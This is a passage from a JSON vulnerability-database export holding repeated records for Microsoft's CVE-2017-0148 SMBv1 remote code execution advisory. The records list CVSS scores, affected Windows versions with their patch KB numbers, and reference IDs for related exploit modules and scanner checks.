""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:56", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T09:06:54", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012216", "KB4013198", "KB4012213", "KB4012217", "KB3177186", "KB4013429", "KB3210720", "KB3213986", "KB4012215", "KB3212646", "KB4012214", "KB3205409", "KB3205401", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:54", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T12:45:41", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-01T12:45:41", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-01T12:45:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3205401", "KB4012214", "KB3177186", "KB3212646", "KBMS16-110, 3187754", "KB3210721", 
"KB4012217", "KB4012212", "KB3210720", "KB3213986", "KB4012598", "KB4012215", "KB4013198", "KB3205409", "KB4012216", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": 